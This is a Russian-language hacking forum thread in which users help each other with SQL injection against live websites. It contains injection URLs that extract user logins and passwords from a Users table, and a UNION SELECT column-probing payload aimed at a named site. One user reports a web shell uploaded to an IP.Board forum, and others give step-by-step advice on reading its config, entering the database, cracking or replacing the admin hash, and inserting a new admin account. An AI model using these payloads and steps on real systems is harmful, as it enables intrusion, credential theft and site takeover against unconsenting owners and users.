Code: .asp?id=1+or+1=(SELECT+TOP+1+cast(UserLogin+as+nvarchar)%2B%27%3A%27%2Bcast(UserPassword+as+nvarchar)+from+Users)- получаю Что не так?
не получится ибо в подзапросах тока select и после union тоже тока select если инъекция в update, то мона, но это зависит от конкретных условий. Если всё удачно, то мона и файлы читать, и выводить всё чё те надо.
. Code: asp?id=1+or+1=(SELECT+TOP+1+cast(UserLogin+as+nvarchar)+':'+cast(UserPassword+as+nvarchar)+from+Users)-- непонял я для чего ты cast использовал, мож там кавычки %27 фильтруются, да и вобще, нах cast то надо? если захотел как суперхеккер сделать то можно весь подзапрос в каст взять, но думаю это не обязательно в твоем случае
народ, я залил шел на IP.Board 2.2.2 © 2007 IPS, Inc. как теперь можно узнать пароль от админки??если можно и несложо обясните поподробние плиз
смотришь когфиг, там пасс, юзер и адрес от БД. Заходишь в эту бд. Смотришь таблтцу с юзверями Ищешь админа - брутишь хэш. Меньше мороки - просто меняешь хэш А лучше - вставить новую запись
ищи конфиг форума, там будет логин и пасс от СУБД, конектишься с этим пасом к базе и ищешь таблицу с юзерами
http://www.pp-pss.ru/main.php?ID=-1 помогите пожалуйста со скулем перебрал до 41 поля http://www.pp-pss.ru/main.php?ID=-1/**/union/**/select/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41/* замучился может по другому как то надо
Он же не ругается да different column а тупо выводит твой запрос. Эдак до потери пульса можно подбирать =) Смотри что там фильтруется и меняй запрос.
http://www.pp-pss.ru/main.php?ID= 1 колонка. без вывода. если мускул выше 4.0.* то возможен посимвольный перебор// но тут 4.0.*. .поэтому он невозможен)
Если в ссылке на Личное письмо в IPB 1.3 подставить в конце ' , то вместо Напишет вот что : .Просто пустой текст.Что это может быть? Также если по той же самой ссылке поставить '; -- то выдаст пустой текст ошибки.